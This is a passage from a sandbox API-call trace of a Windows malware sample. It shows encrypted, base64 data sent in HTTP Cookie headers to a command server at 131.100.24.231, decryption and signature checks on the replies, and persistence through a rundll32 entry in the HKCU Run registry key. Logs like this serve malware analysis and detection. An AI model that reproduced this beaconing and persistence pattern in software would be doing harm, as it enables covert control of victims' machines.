bqUnv=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTong96Z0/ThqUy+PKq8A6KfMqPVS+4bMw9TeGLn8s74gEgIUiOpAAgopbYruD9jpvJpDm/Uni/NG9cwgLrPqkhzM+umqnv+6tmY1LrgFsXZyoRbN\r\n") returned 340 [0232.990] GetProcessHeap () returned 0x530000 [0232.991] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f18 | out: hHeap=0x530000) returned 1 [0232.991] GetProcessHeap () returned 0x530000 [0232.991] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0232.991] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0232.991] GetProcessHeap () returned 0x530000 [0232.991] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0232.992] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0232.993] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="PUxFVbubbsRiyeVOkylFLvjttHGxWuLZOTznFZDJDRCzjBXsCm", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0232.993] GetProcessHeap () returned 0x530000 [0232.993] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0232.993] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0232.993] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0232.993] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0232.993] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: bqUnv=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTong96Z0/ThqUy+PKq8A6KfMqPVS+4bMw9TeGLn8s74gEgIUiOpAAgopbYruD9jpvJpDm/Uni/NG9cwgLrPqkhzM+umqnv+6tmY1LrgFsXZyoRbN\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0235.844] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0235.844] GetProcessHeap () returned 0x530000 [0235.844] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0235.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x126) returned 1 [0235.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f26, dwNumberOfBytesToRead=0xfeda, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f26*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0235.845] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0235.845] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0235.845] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0235.845] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0235.845] GetProcessHeap () returned 0x530000 [0235.846] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0235.846] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0235.846] GetProcessHeap () returned 0x530000 [0235.846] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0235.846] GetProcessHeap () returned 0x530000 [0235.846] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0235.846] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0235.847] GetProcessHeap () returned 0x530000 [0235.847] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0235.847] GetProcessHeap () returned 0x530000 [0235.848] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0235.848] GetProcessHeap () returned 0x530000 [0235.848] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f68 [0235.848] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0235.848] GetProcessHeap () returned 0x530000 [0235.848] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f68 | out: hHeap=0x530000) returned 1 [0235.848] GetProcessHeap () returned 0x530000 [0235.848] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0235.848] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0235.848] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0235.848] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0235.848] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0235.848] GetProcessHeap () returned 0x530000 [0235.849] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0235.849] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0235.849] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0235.851] GetProcessHeap () returned 0x530000 [0235.851] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0235.851] GetProcessHeap () returned 0x530000 [0235.852] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0235.852] GetProcessHeap () returned 0x530000 [0235.852] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0235.852] GetProcessHeap () returned 0x530000 [0235.853] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e2d70 | out: hHeap=0x530000) returned 1 [0235.853] GetProcessHeap () returned 0x530000 [0235.853] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0235.853] GetProcessHeap () returned 0x530000 [0235.853] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0235.853] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0235.854] GetProcessHeap () returned 0x530000 [0235.854] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83960 [0235.854] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GVooMHN") returned 97 [0235.854] GetProcessHeap () returned 0x530000 [0235.854] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83960 | out: hHeap=0x530000) returned 1 [0235.854] GetProcessHeap () returned 0x530000 [0235.854] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0235.854] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0235.855] GetProcessHeap () returned 0x530000 [0235.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0235.856] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GVooMHN") returned 97 [0235.856] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GVooMHN", cbData=0xc4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GVooMHN") returned 0x0 [0235.857] RegCloseKey (hKey=0x670) returned 0x0 [0235.857] GetProcessHeap () returned 0x530000 [0235.857] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0235.857] GetProcessHeap () returned 0x530000 [0235.857] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0235.857] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe573b) returned 0x102 [0245.878] GetProcessHeap () returned 0x530000 [0245.878] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0245.878] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0245.878] GetProcessHeap () returned 0x530000 [0245.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0245.878] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0245.878] GetProcessHeap () returned 0x530000 [0245.878] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0245.878] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0245.878] GetProcessHeap () returned 0x530000 [0245.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0245.878] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83960 [0245.882] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0245.882] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0245.882] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0245.882] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0245.882] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0245.882] FindClose (in: hFindFile=0x2a83960 | out: hFindFile=0x2a83960) returned 1 [0245.883] GetProcessHeap () returned 0x530000 [0245.883] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0245.883] GetProcessHeap () returned 0x530000 [0245.883] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0245.883] GetProcessHeap () returned 0x530000 [0245.883] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0245.883] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0245.885] GetProcessHeap () returned 0x530000 [0245.886] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0245.886] GetProcessHeap () returned 0x530000 [0245.886] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0245.886] GetProcessHeap () returned 0x530000 [0245.886] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f68 [0245.886] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0245.886] GetProcessHeap () returned 0x530000 [0245.886] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f68 | out: hHeap=0x530000) returned 1 [0245.886] GetProcessHeap () returned 0x530000 [0245.886] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0245.887] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0245.887] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0245.887] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0245.887] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0245.887] GetProcessHeap () returned 0x530000 [0245.887] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0245.887] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0245.887] GetProcessHeap () returned 0x530000 [0245.887] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0245.887] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0245.887] GetProcessHeap () returned 0x530000 [0245.887] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0245.887] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0245.887] GetProcessHeap () returned 0x530000 [0245.887] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xba) returned 0x5fafd0 [0245.887] GetProcessHeap () returned 0x530000 [0245.888] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0245.888] GetProcessHeap () returned 0x530000 [0245.888] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0245.888] CryptBinaryToStringW (in: pbBinary=0x5fafd0, cbBinary=0xba, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0245.888] GetProcessHeap () returned 0x530000 [0245.888] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1f2) returned 0x2b443e0 [0245.888] CryptBinaryToStringW (in: pbBinary=0x5fafd0, cbBinary=0xba, dwFlags=0x40000001, pszString=0x2b443e0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToSGAKv6T1Twu+P+OJWH+aq7HDVjAwKXuS0l", pcchString=0x2cf504) returned 1 [0245.888] GetProcessHeap () returned 0x530000 [0245.888] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0245.888] GetProcessHeap () returned 0x530000 [0245.888] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0245.888] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: fDSawZtIsSzFJey=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToSGAKv6T1Twu+P+OJWH+aq7HDVjAwKXuS0l\r\n") returned 274 [0245.889] GetProcessHeap () returned 0x530000 [0245.889] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0245.889] GetProcessHeap () returned 0x530000 [0245.889] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b443e0 | out: hHeap=0x530000) returned 1 [0245.889] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0245.890] GetProcessHeap () returned 0x530000 [0245.890] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0245.890] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0245.895] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="byuxizdZiMBRMMyvTrfAhSUmno", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0245.895] GetProcessHeap () returned 0x530000 [0245.895] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0245.895] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0245.895] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0245.895] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0245.896] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: fDSawZtIsSzFJey=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToSGAKv6T1Twu+P+OJWH+aq7HDVjAwKXuS0l\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0247.172] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0247.172] GetProcessHeap () returned 0x530000 [0247.172] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0247.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x3bc) returned 1 [0247.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b481bc, dwNumberOfBytesToRead=0xfc44, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b481bc*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0247.173] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0247.173] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0247.173] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0247.173] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0247.173] GetProcessHeap () returned 0x530000 [0247.173] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0247.173] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0247.173] GetProcessHeap () returned 0x530000 [0247.173] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0247.173] GetProcessHeap () returned 0x530000 [0247.173] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0247.173] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0247.174] GetProcessHeap () returned 0x530000 [0247.174] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0247.174] GetProcessHeap () returned 0x530000 [0247.174] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0247.174] GetProcessHeap () returned 0x530000 [0247.174] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3d00 [0247.174] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0247.174] GetProcessHeap () returned 0x530000 [0247.175] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3d00 | out: hHeap=0x530000) returned 1 [0247.175] GetProcessHeap () returned 0x530000 [0247.175] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0247.175] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0247.175] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0247.175] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0247.175] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0247.175] GetProcessHeap () returned 0x530000 [0247.175] HeapFree 